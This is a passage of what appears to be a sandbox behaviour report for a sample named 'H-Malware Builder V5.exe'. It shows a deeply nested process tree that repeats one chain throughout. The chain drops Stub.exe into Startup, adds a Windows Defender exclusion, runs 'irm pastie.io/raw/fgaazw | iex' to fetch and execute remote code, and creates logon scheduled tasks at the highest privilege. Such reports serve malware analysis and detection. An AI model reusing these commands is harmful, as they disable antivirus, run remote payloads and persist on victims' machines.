        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        15⤵
        Drops startup file
        
        PID:784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2832
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        16⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2208
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        17⤵
        
        PID:676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        18⤵
        
        PID:536
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3056
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        17⤵
        
        PID:3064
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        16⤵
        Drops startup file
        
        PID:996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:988
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        17⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:492
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        18⤵
        
        PID:1088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        19⤵
        
        PID:2100
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2228
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        18⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2472
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        17⤵
        Drops startup file
        
        PID:1524
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1668
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        18⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2352
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        19⤵
        
        PID:2620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        20⤵
        
        PID:1588
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2548
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1512
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        18⤵
        Drops startup file
        
        PID:1200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2600
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        19⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1436
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        20⤵
        
        PID:1160
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        21⤵
        
        PID:1328
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        20⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2648
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        20⤵
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        19⤵
        Drops startup file
        
        PID:2824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2212
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        20⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2840
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        21⤵
        
        PID:1500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        22⤵
        
        PID:1620
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        21⤵
        
        PID:1164
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1940
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        20⤵
        Drops startup file
        
        PID:584
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2076
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        21⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1880
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        22⤵
        
        PID:1748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        23⤵
        
        PID:2188
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        22⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2344
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        22⤵
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        21⤵
        Drops startup file
        
        PID:1352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        22⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2700
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        22⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:584
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        23⤵
        
        PID:2216
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        24⤵
        
        PID:1872
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1204
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        23⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        22⤵
        Drops startup file
        
        PID:2320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1084
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        23⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:840
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        24⤵
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        25⤵
        
        PID:2144
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        24⤵
        
        PID:2476
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        24⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        23⤵
        Drops startup file
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:892
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        24⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2092
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        25⤵
        
        PID:1592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        26⤵
        
        PID:1752
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2684
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        25⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:492
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        24⤵
        Drops startup file
        
        PID:2440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2384
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        25⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:880
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        26⤵
        
        PID:2892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        27⤵
        
        PID:2988
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        26⤵
        
        PID:2744
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        26⤵
        
        PID:644
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        25⤵
        Drops startup file
        
        PID:2712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1076
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        26⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1696
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        27⤵
        
        PID:1128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        28⤵
        
        PID:3060
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1664
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        27⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2372
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        26⤵
        Drops startup file
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1740
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        27⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2836
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        28⤵
        
        PID:2168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        29⤵
        
        PID:2700
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        28⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2540
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        28⤵
        
        PID:2940
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        27⤵
        
        PID:1676
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        28⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3024
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        28⤵
        
        PID:2712
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        29⤵
        
        PID:1536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        30⤵
        
        PID:2176
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        29⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2504
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        29⤵
        
        PID:2116
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        28⤵
        
        PID:1220
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2428
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        29⤵
        
        PID:536
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        30⤵
        
        PID:1888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        31⤵
        
        PID:1984
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        30⤵
        
        PID:1644
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        30⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        29⤵
        
        PID:2092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        30⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2328
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        30⤵
        
        PID:1872
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        31⤵
        
        PID:2592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        32⤵
        
        PID:1700
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        31⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2988
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        31⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        30⤵
        
        PID:840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2800
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
        31⤵
        
        PID:2480
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
        32⤵
        
        PID:1720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm pastie.io/raw/fgaazw | iex"
        33⤵
        
        PID:1080
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        32⤵
        
        PID:2552
        
        C:\Windows\system32\SCHTASKS.exe
        
        "SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
        32⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
        31⤵
        
        PID:1564
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
        32⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2328
        
